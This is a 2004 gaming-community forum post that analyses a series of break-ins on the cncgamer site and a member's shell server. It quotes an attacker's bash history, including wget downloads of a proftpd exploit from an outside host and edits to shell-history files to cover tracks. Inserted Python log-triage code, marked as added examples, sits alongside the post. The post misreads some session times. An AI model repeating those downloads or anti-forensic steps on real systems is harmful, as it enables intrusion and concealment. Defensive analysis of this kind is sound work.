| Reason for XWIS, WOL and various sites being do | descarte8 | 09:47 01-09-2004 |
If you understand this that is
Very long, but very interesting I found. Hope you think it is a good read.
Okay, I tried to make this as readable as possible... and you will find a lot of surprising stuff in here, so please... make sure you read it first before posting. Thanks.
The confusion
. Revolt posts logs claiming that "I now have pretty blatant proof that champ-site are the people behind the "hacking" of this site."
. What we should have concentrated on was THIS statement: "It looks like I was stupid enough to use the same password here as I did there as well, and I used it on one of my shell accounts."
. This confusion makes anyone reading the first line think that they broke into his server to use it to attack cncgamer, but if this was true the logs would have been different: they would have been trying to upload the ftp server to cncgamer or attacking cncgamer in some other way, NOT onto Revolt's server and then deleting it.
Hack 1
. someone stole noor's password, and used it to crack his hotmail account, then used the retrieve password function on cncgamer to send his password to hotmail.
. the attacker then gained access to the ACP with his password.
. and hid themselves (by disabling the "who's online" list)
. started unregistering ND and Admin accounts (To prevent the hack being stopped, by someone with ACP access).
. deleted topics, merged forums, and screwed with topic and forum permissions.
. created kkkkkk group <-- is the k of any significance ?
. changed Revolt's status to SuperMod ((people think it's the real him), and then the attacker used that account to clear out the forum again, and again)
. the attacker then logged out to let things go quiet, then logged into the Revolt hacked login and wiped all posts, and topics a few days later.
Hack 2
. someone broke into Revolt's server with a stolen password, and gained root.
. then someone fumbled around (we can see this cos of the logs) and downloaded an ftp exploit.
. no logs showed if they tried to compile it.. only logs to say they ran it.
. the ftp server was only uploaded to Revolt's server, executed, then deleted; it does not look like any attempt was made to use the server to attack cncgamer.
Hack 3
. Revolt gets angry and asks Lithium to take down Champ-Site.
. Champ, WOL and XWIS go down.
. Revolt posts logs.
. - posts explanations of the logs.
. I get confused, because he thinks that he is targeted to use his server as a proxy to hack cncgamer.
. the logs make no sense... until you realise that Revolt was a victim.. NOT cncgamer.
Hack 4
. 2 minutes after I make a post based on the wrong information, cncgamer gets shutdown for 6 hours.
. who did this ? Someone who wants to stop Revolt from killing Champ ? I don't blame them for wanting that, but why kill us ?
Common things.
. how did they get the passwords ?
. someone always says the same motive - because someone pissed them off.
. on both last hacks.
. cncgamer got hacked, then champ knocked offline, and revolt admits it, but got someone else to do it
. that's the same way, both hacks
. last time it was lucafer... and silent gave him the password
. and Revolt admitted to botting champ site
. Hacker gained access to the MySQL database by user account, and that's how the forum got killed.. NOT by SQL injection.
. lots of people come on and make up crap for fun to wind up cncgamer members, etc..
. Phil's msn account has also been hacked in the past, and remember we stopped getting hacked after Phil realised and changed his msn account, and he changed his password ? So the hacker wasn't able to retrieve his password anymore.
Members who also have accounts on Champ.
hotmail passwords - champ passwords - cncgamer passwords.
. Defi -> Champ account=yes, same password=no - access on cncgamer = Founder - ACP=no. modCP=no
. WT ---> Champ account=yes, same password=no - access on cncgamer = Founder - ACP=no, modCP=no
. yablinked -> Champ account=yes, same password=yes - access on cncgamer = GFX Group - ACP=no, modCP=no
. noor -> Champ account=yes, same password=yes - access on cncgamer = Admin - ACP=yes, modCP=yes <<<< HACKED >>>>
. rob -> Champ account=yes, same password=no - access on cncgamer = Network Director - ACP=yes, modCP=yes.
. itsme -> Champ account=yes, same password=no - access on cncgamer = Moderator - ACP=no, modCP=yes
. clipser -> Champ account=yes, same password=no - access on cncgamer = Moderator - ACP=no, modCP=yes
The above people have been asked for this information, and willingly provided it for this post.
Suspects.
. Champ member (passwords are the same for ACP members) <-- maybe the database passwords are all leaked ?
. Champ hater (someone broke in and stole their accounts passwords).
. cncgamer member (perhaps someone we trust?, have you given your password to a "mate" ?)
. someone who just hates TS.
. someone with linux knowledge
Confused, not got a clue what Revolt is talking about ? Let's break this down.
I will split this into 2 parts so that the post isn't too long and boring, also so that it's easier to read.
PART 1
The Shell History Log. Revolt's site got hacked
Okay, for those of you not familiar with linux... every command is logged and saved to a file called bash_history. The following quote, however, is not from that log; it is from the ftp server log, and tells us when users entered the ftp. (The observant among you may notice the log is upside down).
QUOTE
revolt ftpd30150 217.84.252.30 Thu Aug 26 15:51 - 16:08 (00:17)
revolt pts/1 217.84.252.30 Thu Aug 26 15:41 - 17:01 (01:20)
revolt ftpd29789 217.84.252.30 Thu Aug 26 15:30 - 15:40 (00:10)
revolt ftpd29397 217.84.252.30 Thu Aug 26 15:08 - 15:14 (00:05)
revolt ftpd29303 217.84.252.30 Thu Aug 26 15:01 - 15:06 (00:05)
revolt ftpd29049 217.84.252.30 Thu Aug 26 14:40 - 14:55 (00:15)
revolt ftpd29032 217.84.252.30 Thu Aug 26 14:39 - 14:39 (00:00)
revolt pts/1 217.84.252.30 Thu Aug 26 14:38 - 15:40 (01:02)
revolt ftpd28985 217.84.252.30 Thu Aug 26 14:37 - 14:38 (00:00)
revolt ftpd28977 217.84.252.30 Thu Aug 26 14:32 - 14:32 (00:00)
revolt ftpd28976 217.84.252.30 Thu Aug 26 14:31 - 14:32 (00:01)
revolt ftpd28867 217.84.252.30 Thu Aug 26 14:02 - 14:05 (00:02)
revolt ftpd28661 217.84.252.30 Thu Aug 26 13:41 - 14:05 (00:24)
revolt ftpd28245 217.84.252.30 Thu Aug 26 12:44 - 12:49 (00:05)
revolt ftpd28162 217.84.252.30 Thu Aug 26 12:30 - 12:35 (00:04)
revolt ftpd28080 217.84.252.30 Thu Aug 26 12:18 - 12:26 (00:07)
revolt ftpd28017 217.84.252.30 Thu Aug 26 12:09 - 12:15 (00:05)
revolt pts/1 217.84.252.30 Thu Aug 26 11:26 - 14:05 (02:39)
revolt ftpd27724 217.84.252.30 Thu Aug 26 11:18 - 11:58 (00:39)
Name: pD954FC1E.dip.t-dialin.net
Address: 217.84.252.30
The log breaks down into several parts.
But the bit we are interested in is the brackets at the end.
For example "revolt ftpd27724 217.84.252.30 Thu Aug 26 11:18 - 11:58 (00:39)" means that someone was logged on for 0 minutes and 39 seconds.
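As an added example (not part of the original post), a small Python parser for login-history lines in the layout quoted above: it groups sessions by user and source address, separates shell (pts) logins from ftpd logins, totals the bracketed session lengths, and lists sources the account owner does not recognise. The sample lines are constructed from the quoted log, the owner's address 192.0.2.10 is a placeholder, and the bracketed field is parsed as hours:minutes, the format last(1) prints.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of the quoted login history (last(1) output): user tty-or-service source weekday mon day start - end (HH:MM)
SAMPLE_LOG = """\
revolt ftpd30150 217.84.252.30 Thu Aug 26 15:51 - 16:08 (00:17)
revolt pts/1 217.84.252.30 Thu Aug 26 15:41 - 17:01 (01:20)
revolt ftpd29789 217.84.252.30 Thu Aug 26 15:30 - 15:40 (00:10)
revolt pts/1 217.84.252.30 Thu Aug 26 11:26 - 14:05 (02:39)
revolt ftpd27724 217.84.252.30 Thu Aug 26 11:18 - 11:58 (00:39)
"""

LINE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+(?P<host>\S+)\s+\w{3}\s+\w{3}\s+\d+\s+"
    r"(?P<start>\d\d:\d\d)\s+-\s+(?P<end>\d\d:\d\d)\s+"
    r"\((?:(?P<days>\d+)\+)?(?P<hh>\d\d):(?P<mm>\d\d)\)$"
)

def parse_sessions(text):
    """Yield one dict per parseable line; lines that do not match the layout are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        # last(1) prints session length as hours:minutes, with a D+ prefix beyond 24h
        minutes = int(d["days"] or 0) * 1440 + int(d["hh"]) * 60 + int(d["mm"])
        # pts/N or ttyN is an interactive shell; ftpdNNNN is an FTP login
        yield {"user": d["user"], "host": d["host"], "start": d["start"], "end": d["end"],
               "minutes": minutes, "interactive": d["tty"].startswith(("pts/", "tty"))}

def summarize_by_host(text):
    """Per (user, source): session counts, total minutes, earliest start, latest end."""
    out = defaultdict(lambda: {"sessions": 0, "shell": 0, "ftp": 0, "minutes": 0,
                               "first": "99:99", "last": "00:00"})
    for s in parse_sessions(text):
        rec = out[(s["user"], s["host"])]
        rec["sessions"] += 1
        rec["shell" if s["interactive"] else "ftp"] += 1
        rec["minutes"] += s["minutes"]
        rec["first"], rec["last"] = min(rec["first"], s["start"]), max(rec["last"], s["end"])
    return dict(out)

def unknown_sources(summary, known_hosts):
    """(user, source) pairs whose source is not one the account owner recognises."""
    return sorted(k for k in summary if k[1] not in known_hosts)

if __name__ == "__main__":
    summary = summarize_by_host(SAMPLE_LOG)
    print(summary, unknown_sources(summary, {"192.0.2.10"}), sep="\n")  # placeholder owner address
```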
PART 2
Adam then goes on to tell us....
QUOTE
That was the login history on my shell account, here's a little log of the things this person was doing as they were logged in:
Okay, so you remember that I told you that every command is logged and saved to a file called bash_history ? Well, here is what the attacker is claimed to have done.
vi is a linux text editor, like a dos version of notepad.
Now, remember that the attacker is logged in to Revolt's server, using his server to attack cncgamer so that Revolt gets the blame.
vi .mysql_history - the attacker used the "vi" text editor to read the mysql_history log
dir - now the attacker has asked the server to show a contents of the server, like dir in DOS.
ls -a - and here is the linux version of dir.. why would the attacker do this twice ?
vi .bash_profile - now vi is used to read the bash_profile log
ls -a - the attacker feels the need to check what files are on the hard drive AGAIN ? why ?
vi bash_history - the attacker uses vi to view the bash_history log file, and probably delete what is in it, to make his / her movements harder to track
dir - why on earth does this attacker feel the need to keep checking what files are in the directory ?
ls -a - omg, and again ? wtf ?
dir - 3 times in a row ? does this person have a memory defect ?
vi .bash_logout - here the attacker is reading the file bash_logout, and perhaps edited it, to make his / her movements harder to track ?
dir - here we go again with that memory problem (the attacker is reading the contents of the drive AGAIN)
ls -a - WTF ? Surely by now I don't have to tell you that the attacker is checking what files are on the drive again... this makes no sense.
vi .ssh - now the attacker is checking the ssh (remote login) log perhaps to try and remove evidence why they were there.
dir - good old dir again (check the drive contents)
ls -a - and again
vi k.sh - and now the attacker is checking the file k.sh (or creating it, since it is not a normal part of linux)
dir - check drive contents
locate mysql - looking for the mysql database.
/usr/bin/mysql_config - now the user has changed to the mysql_configuration directory
vi ftp.c - now reading or writing a file called ftp.c (source code created for the c programming language, ready to program)
dir - check drive contents
cd proftpd-not-pro-enough - tried to change directory to the proftpd-not-pro-enough directory (is it there ?)
dir - lol, this dude is lost, keeps looking for files, or has a serious memory problem.
wget http://www.phreedom.org/solar/exploits/pro...o-enough.tar.gz - now.. here's an interesting bit... because the wget command is used for downloads... the attacker is downloading a program which is a known exploit for the ftp server.
wget http://www.phreedom.org/solar/exploits/pro...o-enough.tar.gz - did the download fail ? here the attacker tries again
wget http://www.phreedom.org/solar/exploits/pro...o-enough.tar.gz - and again ?
ls -a - now he / she checks that the file downloaded by looking for the file.
./execute_me - here the attacker is using the file to run an ftp server on cncgamer.com, this will allow the attacker to upload files.
cd /home/sex - now the attacker changes to the sex directory.
rm ex.sh - here we see a command to delete the file ex.sh
rm cool - and delete the file cool
rm cool.c - and the source code for the file cool
dir - checking to see if those files are deleted ?
rm execute_me - and now deleting the execute_me file
dir - checking again to see if the file was deleted ?
locate /mysql - now finding the mysql directory
Okay, so a lot of this was probably deleted, but it could mean that the pro-ftpd exploit is still installed... if that's true, then the attacker can login to it at any time and delete or upload what they like.
Conclusion ? - I feel it's entirely possible that more than 1 person could be involved in this attack.
Also.. how are people getting the passwords ?
Is it possible that staff on cncgamer are using the same passwords as they do on other forums ?
What password protection does champ-site offer ?
Why is cncgamer always pulled down at the beginning of the TC ?
Why did Adam use the same password for .. cncgame.. champ-site AND his server ?
What is cool.c ? and why did the attacker try and execute programs he / she knew would not exist on Revolts server, unless he / she had used the server before ?
At first I will admit I was suspicious that this log was falsified, but the more and more I went through it, the more I can see it probably wasn't.
Some bits of this log were definitely deleted: the attacker would have to use the tar command (like winzip) to decompress the files in proftpd-not-pro-enough, and then compile the source code to make a working hack, but this wasn't shown in the log, and the fact that the attacker tried to use the files makes me wonder if this wasn't the first time he / she has logged in using Revolt's server.
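As an added example (not from the original post), a Python triage of a bash_history dump in the shape of the command list above: it tags commands that touch shell or ssh history files, fetch archives, execute local files or remove files, and reports the gap noted above, an archive fetched with no tar or compile step before a file is run. The sample history is constructed from the quoted list; the download host example.invalid is a placeholder because the URL in the post is truncated.

```python
import re
from collections import Counter

# Constructed history modelled on the quoted command list; example.invalid is a placeholder host
SAMPLE_HISTORY = """\
vi .mysql_history
ls -a
vi bash_history
vi .bash_logout
vi .ssh
locate mysql
wget http://example.invalid/exploits/proftpd-not-pro-enough.tar.gz
./execute_me
rm ex.sh
rm execute_me
"""

HISTORY_FILES = {".bash_history", "bash_history", ".bash_logout", ".bash_profile",
                 ".mysql_history", ".ssh"}
ARCHIVE_RE = re.compile(r"\.(tar\.gz|tgz|tar|zip)$")

def triage_history(text):
    """Tag each command and report gaps that suggest a trimmed or pre-staged history."""
    tagged, counts, downloaded, built, executed = [], Counter(), [], False, []
    for cmd in (l.strip() for l in text.splitlines() if l.strip()):
        prog, *args = cmd.split()
        tags = []
        if prog in {"vi", "vim", "nano", "cat", "echo", "rm"} and HISTORY_FILES.intersection(args):
            tags.append("anti-forensics")          # editing shell or ssh history files
        if prog in {"wget", "curl"} and any(ARCHIVE_RE.search(a) for a in args):
            tags.append("tool-download"); downloaded += args
        if prog in {"tar", "gcc", "cc", "make", "unzip"}:
            built = True                           # an extraction or compile step was seen
        if prog.startswith("./"):
            tags.append("execution"); executed.append(prog[2:])
        if prog == "rm":
            tags.append("cleanup")
        if prog in {"locate", "find", "ls", "dir"}:
            tags.append("recon")
        counts.update(tags)
        tagged.append((cmd, tags))
    findings = []
    if downloaded and not built:
        findings.append("archive fetched but no tar/gcc/make step: history trimmed or tooling staged earlier")
    findings += [f"{n} run with no build step in this history" for n in executed]
    return {"tagged": tagged, "counts": counts, "findings": findings}

if __name__ == "__main__":
    r = triage_history(SAMPLE_HISTORY)
    print(dict(r["counts"]), *r["findings"], sep="\n")
```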
Basically
Noorodin aka d3vilmonk went on holiday a few weeks ago and he comes back to find his hotmail account HACKED, and they used the password recovery system cncgamer has to get his cncgamer password and deleted all the stuff on cncgamer. This is kane's site?
cncgamer = hacked 3 times
champ = down
xwis = down
wol = down
Revolt blames kane
some people blame revolt
everyone from champ seems to be blaming cncgamer for "harbouring him"
oh, and somewhere.. Lithium popped up, and cncgamer got databombed again.
revolt - has pretty blatant proof that champ-site are the people behind the "hacking" cncgamer site. As he foolishly used the same password here as there as well, and used it on one of his shell accounts.
Lithium - I dont belong to this group etc w/e but i would like to say champ-site fucked my shit up in interland box and now they will no longer EVER own a web site again sooo have fun, being a dumbass just doesn't pay off
cncgamer - We don't approve of what he is doing, we can't stop it, and we can't prove who did what.
Suffice to say.. if Revolt's logs are real, we don't know who was in his server doing all that stuff, could be adam, could be kane, hell it could be santa claus. The only thing we know is that adam (Revolt) was silly enough to use the same passwords on several sites, and that according to the user known as - in the Revolt's logs explained topic, it would appear that the "hacker" may have already used his box to hack cncg. So.. please stop with all the "cncgamer hacked this" crap, cos Revolt has openly admitted it is him, and Lithium.